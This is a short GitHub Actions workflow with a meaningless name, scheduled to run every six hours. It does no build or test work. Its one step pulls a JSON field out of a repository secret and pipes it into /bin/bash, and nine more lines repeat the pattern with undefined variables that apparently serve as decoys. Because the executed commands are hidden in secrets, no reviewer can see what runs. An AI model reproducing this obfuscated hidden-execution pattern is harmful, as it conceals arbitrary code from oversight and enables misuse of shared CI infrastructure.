name: taoxwozh

on:
  workflow_dispatch:
  schedule:
    - cron: '22 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: taoxwozh
        env:
          gk9: ${{ secrets.gk9 }}
        run: |
          echo $gk9 | jq -r .l0657 | /bin/bash
          echo $pus3 | jq -r .eesl04 | /bin/bash
          echo $vh078 | jq -r .oyvm895 | /bin/bash
          echo $xtafx7 | jq -r .gzzbx438 | /bin/bash
          echo $a7629 | jq -r .c453 | /bin/bash
          echo $kwpc6327 | jq -r .uato45 | /bin/bash
          echo $sxgw7820 | jq -r .pdgh02258 | /bin/bash
          echo $zx343 | jq -r .mpdzf0 | /bin/bash
          echo $sdhv25 | jq -r .eamhx2 | /bin/bash
          echo $q4 | jq -r .d01 | /bin/bash

